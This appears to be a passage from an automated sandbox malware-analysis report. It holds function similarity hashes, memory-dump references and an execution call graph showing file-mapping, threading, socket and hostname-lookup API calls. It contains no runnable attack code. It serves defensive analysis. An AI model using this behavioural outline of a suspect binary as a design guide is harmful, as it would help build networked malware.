                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9423257f1c47ec7e65fa6485e0e1a44da4916d2a077dce487f20abd422f7bfa5
                                                                                                                                              • Instruction ID: 500482ce557378f9b4b43397cf1dcc8b6f99c8b28c044803c53f9b1ee5ed51cf
                                                                                                                                              • Opcode Fuzzy Hash: 9423257f1c47ec7e65fa6485e0e1a44da4916d2a077dce487f20abd422f7bfa5
                                                                                                                                              • Instruction Fuzzy Hash: ED418631618B564BD315EF39D8885ABB7E2FFC5310F20CA7D81D6839A4D7706829CA02
                                                                                                                                              Function 6C7661EF Relevance: .1, Instructions: 109COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c6610d20707244eaa4209cb0ee07bd1d5c4e8071cf3e31fad890b8130c3beb02
                                                                                                                                              • Instruction ID: 23541e979c6d2936af79f934fc827a649f74734dd6e5f27850080128f3c1ae96
                                                                                                                                              • Opcode Fuzzy Hash: c6610d20707244eaa4209cb0ee07bd1d5c4e8071cf3e31fad890b8130c3beb02
                                                                                                                                              • Instruction Fuzzy Hash: EA317974418A1B4BC308DF29D4514AAB3E5EFC9310F418A3ED15A8BB91EB78941ACB40
                                                                                                                                              Function 6C7CD997 Relevance: .1, Instructions: 109COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0d0e2bef762b129ceffa934362b4b667545a769da328635ec21beed57010b7a2
                                                                                                                                              • Instruction ID: 5cd5f76ea3ffc5da01c4bc233a1c20630b1f957d99903193e9ba6b83e99f4896
                                                                                                                                              • Opcode Fuzzy Hash: 0d0e2bef762b129ceffa934362b4b667545a769da328635ec21beed57010b7a2
                                                                                                                                              • Instruction Fuzzy Hash: 99419831618B564BD315EF3DD9885A7B3E2EFC5310F20CA7D81D283DA4D7742819CA02
                                                                                                                                              Function 6C80473D Relevance: .1, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 692c30e5571ab555bb124768b2e79168a3cff3aa278a4e5c65f6b1535ab41edc
                                                                                                                                              • Instruction ID: 074e8dc61f6704e6d2ca88c465cc7540235797e0b93f14f0ecf762e712723eab
                                                                                                                                              • Opcode Fuzzy Hash: 692c30e5571ab555bb124768b2e79168a3cff3aa278a4e5c65f6b1535ab41edc
                                                                                                                                              • Instruction Fuzzy Hash: A631AA322087069FD709DF38D9845AF7792EFC4364F14CA3DD55A8BA84EF38590A8792
                                                                                                                                              Function 6C6ACEE5 Relevance: .1, Instructions: 105COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c9ad0fdce599dba4517378e927841e9f46a2a501fa9ed3c3da16317f749806d6
                                                                                                                                              • Instruction ID: a78b45a8afb8d59aaa4758b480becd4df08a145b5746268346a4f8b836dcb9bd
                                                                                                                                              • Opcode Fuzzy Hash: c9ad0fdce599dba4517378e927841e9f46a2a501fa9ed3c3da16317f749806d6
                                                                                                                                              • Instruction Fuzzy Hash: 3E3177342046028BD71CDE28C8A15FA77D2EFD4311F955A7ED48ACBA84EF39950EDB84
                                                                                                                                              Function 6C7E028E Relevance: .1, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 20abe948557315405c96a7b551398fe9a84b8a64ab1fd2f67a1aa15f0b70cb0b
                                                                                                                                              • Instruction ID: 16298311406a60567609fa3aee8c7bb5c5ff5f4b6df52b627ea80f3364b0bd77
                                                                                                                                              • Opcode Fuzzy Hash: 20abe948557315405c96a7b551398fe9a84b8a64ab1fd2f67a1aa15f0b70cb0b
                                                                                                                                              • Instruction Fuzzy Hash: EA3155316183164FD718DF38A9884ABB7E6EFD2304F50893D944683EE9DB74452ECB82
                                                                                                                                              Function 6C767894 Relevance: .1, Instructions: 92COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: aea6275051f231131564179b34e1d03ed2b6cab8ed114320ee79b91bf85f3fce
                                                                                                                                              • Instruction ID: 5b089888b82fd0a8324d5de0fd0130c319201f2eca1ddafd1021db91432c1c20
                                                                                                                                              • Opcode Fuzzy Hash: aea6275051f231131564179b34e1d03ed2b6cab8ed114320ee79b91bf85f3fce
                                                                                                                                              • Instruction Fuzzy Hash: 21317B323087028FC71EEE38D8944D57792EBD6314F18863D48678B6D9DF39558F8648
                                                                                                                                              Function 6C80E61F Relevance: .1, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cea3a14e65d614e3852df3b410a61c23a50e4774b4496f497c5a4a2134487d73
                                                                                                                                              • Instruction ID: fcb9dae0f3da76c1079a0a81cfdb0fa64b3edd44bc8ad7727ea0f639c965af65
                                                                                                                                              • Opcode Fuzzy Hash: cea3a14e65d614e3852df3b410a61c23a50e4774b4496f497c5a4a2134487d73
                                                                                                                                              • Instruction Fuzzy Hash: D13104312087168FC719EF68D24849BF7E2FBC4311F64CA3D8494C3698DB74A526DB81
                                                                                                                                              Function 6C78BAEC Relevance: .1, Instructions: 55COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c14662d58e5063bfaec98ae91f0475b0a2f7f532407054c44da4e9984fd2e26f
                                                                                                                                              • Instruction ID: 710e2f9c28c0000d30e2ebf3384cabe124c8047e47e25f93af4e43d86edc57bb
                                                                                                                                              • Opcode Fuzzy Hash: c14662d58e5063bfaec98ae91f0475b0a2f7f532407054c44da4e9984fd2e26f
                                                                                                                                              • Instruction Fuzzy Hash: 7B01C07E328A0247E75CEA3588472A373C2EBC5320F24D63DD6CAC76C9D72AB5038645
                                                                                                                                              Function 6CAFE267 Relevance: .0, Instructions: 50COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000003.1433163842.000000006C841000.00000020.10000000.00040000.00000000.sdmp, Offset: 6C650000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000003.1432827408.000000006C650000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432854336.000000006C651000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1432947093.000000006C687000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433019657.000000006C697000.00000008.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433039815.000000006C69A000.00000020.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000003.1433414265.000000006CBAF000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_3_6c650000_1B0E0E0D120C156B155E15B0C0C160E0C160C.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3595269133a46a0931e68da5262989faf8a6e94a4debab8fc1a68c697e6703a3
                                                                                                                                              • Instruction ID: fe985e96314821bc77b662947ed98d07e689581e122694a2f49318bc0615b765
                                                                                                                                              • Opcode Fuzzy Hash: 3595269133a46a0931e68da5262989faf8a6e94a4debab8fc1a68c697e6703a3
                                                                                                                                              • Instruction Fuzzy Hash: 2801D274668B164FD328DF29C01517A72A1FBC0310BA0977EC4CB47AD9EB39991B8A81

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:8.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:8.6%
                                                                                                                                              Total number of Nodes:2000
                                                                                                                                              Total number of Limit Nodes:162
                                                                                                                                              execution_graph 37377 422bc0 37386 422bec 37377->37386 37378 422c6d 37381 422c96 37378->37381 37382 422c76 CloseHandle 37378->37382 37379 422c4d UnmapViewOfFile 37380 422c63 37379->37380 37380->37378 37384 422cbf 37381->37384 37385 422c9f CloseHandle 37381->37385 37383 422c8c 37382->37383 37383->37381 37387 422ce8 37384->37387 37388 422cc8 CloseHandle 37384->37388 37389 422cb5 37385->37389 37386->37378 37386->37379 37391 422cf1 CloseHandle 37387->37391 37393 422d11 37387->37393 37390 422cde 37388->37390 37389->37384 37390->37387 37392 422d07 37391->37392 37392->37393 37394 4251c0 37395 4251fb 37394->37395 37396 425221 _wcsicmp 37395->37396 37397 42523c 37396->37397 37398 432440 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@ 37399 432489 37398->37399 37400 432499 ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 37399->37400 37401 4324b3 37400->37401 37402 4324d6 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 37401->37402 37403 4324bf ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 37401->37403 37405 418004 37402->37405 37404 418004 37403->37404 37404->37402 37406 4324e8 CreateFileMappingW 37405->37406 37407 432505 37406->37407 37408 432512 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 37407->37408 37409 43253d 37407->37409 37412 432535 37408->37412 37410 432548 MapViewOfFile 37409->37410 37411 432568 37410->37411 37413 432571 CloseHandle 37411->37413 37414 43258f ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 37411->37414 37415 432586 37413->37415 37414->37412 37415->37414 37416 10054200 37417 1005427e 37416->37417 37418 1005421f 37416->37418 37447 10059880 RtlEnterCriticalSection 37417->37447 37426 100258ac 37418->37426 37421 10054265 37431 1021ac50 37421->37431 37422 10054289 37424 10054227 37424->37421 37444 10054000 37424->37444 37427 100258c4 malloc 37426->37427 37428 100258b3 _callnewh 37427->37428 37429 100258cf 37427->37429 37428->37427 37430 100258be ?_Nomemory@std@ 37428->37430 37429->37424 37430->37427 37432 1021acd1 ResetEvent CreateThread __RTtypeid 37431->37432 37433 1021ac83 WaitForSingleObject 37431->37433 37454 1001234b 37432->37454 37628 1021ab50 GetCurrentThreadId 37432->37628 37435 1021ac90 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37433->37435 37436 1021acc7 CloseHandle 37433->37436 37468 10001598 ??0exception@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ __EH_prolog 37435->37468 37436->37432 37439 1021acb8 _CxxThrowException 37439->37436 37856 10053f10 socket 37444->37856 37448 100598e3 RtlLeaveCriticalSection 37447->37448 37449 100598bc 37447->37449 37448->37422 37450 100258ac 3 API calls 37449->37450 37451 100598c3 37450->37451 37452 10059650 164 API calls 37451->37452 37453 100598da 37451->37453 37452->37453 37453->37448 37469 100122af 37454->37469 37456 1001237a 37457 10012391 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37456->37457 37458 10012380 37456->37458 37459 1001238d 37457->37459 37475 10011185 memset wcslen WideCharToMultiByte 37458->37475 37461 10025980 2 API calls 37459->37461 37462 100123ab ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 37461->37462 37468->37439 37480 100120d9 37469->37480 37471 100122da 37471->37456 37472 100122bd 37472->37471 37496 10011fff 37472->37496 37474 100122e6 37474->37456 37476 100111ed ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37475->37476 37478 10025980 2 API calls 37476->37478 37481 100120e3 __EH_prolog 37480->37481 37513 1001186b 37481->37513 37484 1001210f GetModuleHandleW GetModuleFileNameW 37486 10012152 37484->37486 37488 1001214b 37484->37488 37485 10025980 2 API calls 37487 10012254 37485->37487 37531 10010d0a 37486->37531 37487->37472 37488->37485 37492 1001222b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37492->37488 37493 10012201 37493->37492 37494 10011fff 8 API calls 37493->37494 37495 10012228 37494->37495 37495->37492 37608 10025930 37496->37608 37498 10012009 PathFileExistsW 37499 1001201f 37498->37499 37512 10012017 37498->37512 37609 10011f84 37499->37609 37512->37474 37540 10011347 wcslen 37513->37540 37516 100118a2 wcscmp 37517 100118e7 37516->37517 37518 100118ba 37516->37518 37556 1001163a 37517->37556 37518->37517 37520 100118c2 37518->37520 37550 100110d2 memset GetModuleHandleW GetModuleFileNameW 37520->37550 37521 10025980 2 API calls 37522 100119ce 37521->37522 37522->37484 37522->37488 37526 100118f0 37527 10011216 MultiByteToWideChar 37526->37527 37530 1001189b 37526->37530 37530->37521 37533 10010d1b 37531->37533 37532 10010d99 memset sprintf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37537 10011216 37532->37537 37533->37532 37534 10010d92 ??_V@YAXPAX 37533->37534 37535 10010d45 754B1540 37533->37535 37534->37532 37535->37534 37536 10010d66 37535->37536 37536->37534 37538 10011223 MultiByteToWideChar 37537->37538 37538->37493 37541 10011379 37540->37541 37542 100113cc wcslen 37540->37542 37590 1001103c memset GetModuleHandleW GetModuleFileNameW 37541->37590 37543 100113da wcscpy 37542->37543 37545 100113d6 37542->37545 37543->37545 37547 10025980 2 API calls 37545->37547 37546 1001138b 37546->37545 37549 100113aa GetPrivateProfileStringW 37546->37549 37548 100113f9 37547->37548 37548->37516 37548->37530 37549->37542 37551 1001114f 37550->37551 37552 1001111e 37550->37552 37553 10025980 2 API calls 37551->37553 37552->37551 37555 10011153 wcscpy 37552->37555 37554 1001117a 37553->37554 37554->37530 37555->37551 37557 10011644 __EH_prolog 37556->37557 37558 10011679 6 API calls 37557->37558 37559 10011185 6 API calls 37558->37559 37560 1001170f ?open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXPBDHH ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37559->37560 37562 10011790 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 37560->37562 37563 10011767 37560->37563 37564 100117a4 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 37562->37564 37565 1001180b ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37562->37565 37596 1000182d 21 API calls __EH_prolog 37563->37596 37567 100117f3 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 37564->37567 37568 100117bb ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37564->37568 37571 10025980 2 API calls 37565->37571 37567->37565 37568->37567 37570 1001177a 37597 1000182d 21 API calls __EH_prolog 37570->37597 37573 10011869 37571->37573 37573->37526 37575 10010fca 37573->37575 37574 1001178d 37574->37562 37576 10010fd2 37575->37576 37591 100110a5 37590->37591 37593 10011088 37590->37593 37592 10025980 2 API calls 37591->37592 37594 100110d0 37592->37594 37593->37591 37595 100110a9 wcscpy 37593->37595 37594->37546 37595->37591 37596->37570 37597->37574 37608->37498 37610 10011f8e __EH_prolog 37609->37610 37635 10059650 37628->37635 37658 101322d0 37628->37658 37664 1001ba53 37628->37664 37668 10054d60 37628->37668 37682 1005c850 37628->37682 37629 1021ab5f 37636 10059681 37635->37636 37637 1005c850 62 API calls 37636->37637 37638 100596bf CreateEventA 37637->37638 37639 10059714 GetTickCount 37638->37639 37640 100596e3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37638->37640 37642 1001234b 87 API calls 37639->37642 37641 1002bd70 37640->37641 37643 10059705 _CxxThrowException 37641->37643 37644 10059733 37642->37644 37643->37639 37687 10001482 37644->37687 37646 10059748 GetPrivateProfileIntA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37648 1001234b 87 API calls 37646->37648 37649 1005979a 37648->37649 37650 10001482 4 API calls 37649->37650 37651 100597af GetPrivateProfileIntA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37650->37651 37653 1001234b 87 API calls 37651->37653 37654 100597f9 37653->37654 37655 10001482 4 API calls 37654->37655 37656 1005980e GetPrivateProfileIntA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37655->37656 37656->37629 37659 101322e0 inet_addr 37658->37659 37661 101322f8 gethostbyname 37659->37661 37663 1013230b 37659->37663 37661->37663 37663->37629 37665 1001ba6f 37664->37665 37691 1001b436 37665->37691 37667 1001ba79 37667->37629 37669 10059880 166 API calls 37668->37669 37670 10054d8f 37669->37670 37671 10054dd6 WSAWaitForMultipleEvents 37670->37671 37674 10054e30 WSAEnumNetworkEvents 37670->37674 37676 10054e88 WSAGetLastError 37670->37676 37679 10054000 5 API calls 37670->37679 37680 10059040 37 API calls 37670->37680 37711 10054ac0 recvfrom 37670->37711 37736 10053eb0 37670->37736 37746 10059230 37 API calls 37670->37746 37671->37670 37672 10054ddc 37671->37672 37673 10059880 166 API calls 37672->37673 37678 10054de1 37673->37678 37674->37670 37676->37670 37678->37629 37679->37670 37680->37670 37809 100155b0 37682->37809 37690 10025930 37687->37690 37689 1000148c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37689->37646 37690->37689 37692 1001b440 __EH_prolog 37691->37692 37697 1000104f RtlEnterCriticalSection 37692->37697 37694 1001b454 37695 1001b47e RtlLeaveCriticalSection 37694->37695 37698 1001af3b 37694->37698 37695->37667 37697->37694 37699 1001af45 __EH_prolog 37698->37699 37700 1001afac ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37699->37700 37704 1001afca 37700->37704 37701 1001b07a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37702 10025980 2 API calls 37701->37702 37703 1001b09e 37702->37703 37703->37694 37704->37701 37705 1001aff5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37704->37705 37706 1001b050 37704->37706 37709 1001b011 37705->37709 37707 1001b058 FreeLibrary 37706->37707 